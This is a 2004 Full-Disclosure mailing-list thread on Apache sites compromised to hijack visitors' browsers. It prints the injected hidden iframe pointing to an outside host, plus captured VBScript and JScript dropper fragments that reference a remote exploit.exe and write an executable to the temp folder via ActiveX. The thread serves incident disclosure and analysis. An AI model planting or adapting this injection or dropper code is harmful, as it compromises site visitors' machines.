[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-Disclosure] browser hijack by apache sites
- To: filbert@xxxxxxxxxx
- Subject: Re: [Full-Disclosure] browser hijack by apache sites
- From: D B <geggam692000@xxxxxxxxx>
- Date: Sun, 23 May 2004 10:16:55 -0700 (PDT)
using konqueror i got it to download these two files
Filename 1: 2DimensionOfExploitsEnc.php
<html>
<script language=vbs>
szURL = "http://www.pizdato.biz/acc1/exploit.exe";
</script>
<script language="VBScript.Encode">
Filename 2: object2.cfm
<script language=jscript>
self.moveTo(5000,5000);
self.close();
fs=new ActiveXObject("Scripting.FileSystemObject");
fname=fs.GetSpecialFolder(2)+'\\q381275.exe';
a=fs.CreateTextFile(fname,true);
a.Write('MZ');
a.Close();
a=fs.OpenTextFile(fname,8,false,true);
>Message: 1
>From: Filbert <filbert@xxxxxxxxxx>
>Reply-To: filbert@xxxxxxxxxx
>To: full-disclosure@xxxxxxxxxxxxxxxx
>Date: Sun, 23 May 2004 15:19:30 +0200
>Organization: Hell
>Subject: [Full-Disclosure] browser hijack by apache
>sites
>Hi,
>This is the second time this weekend that I've been
>warned of an apache
>site
>on a Linux server were a line of code was added to
>redirect browsers to
>porn
>sites.
>First was the site of a Belgian political party.
>Second came today, and
>as of
>writing this it's still there. The admin was informed
>so it can be gone
>soon.
>hxxp://www.previsit.com/carrefour/nl/ <- hxxp must
>changed to http
>IE users do NOT click.
>the code added at the bottom is:
><iframe SRC="http://www.b00gle.com/fa/?d=get"; WIDTH=1
>HEIGHT=1></iframe></body>
>anyone seen this before? What vulnerability is
>exploited here? FP?
>Thx,
>Filb.
__________________________________
Do you Yahoo!?
Yahoo! Domains ? Claim yours for only $14.70/year
http://smallbusiness.promotions.yahoo.com/offer
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html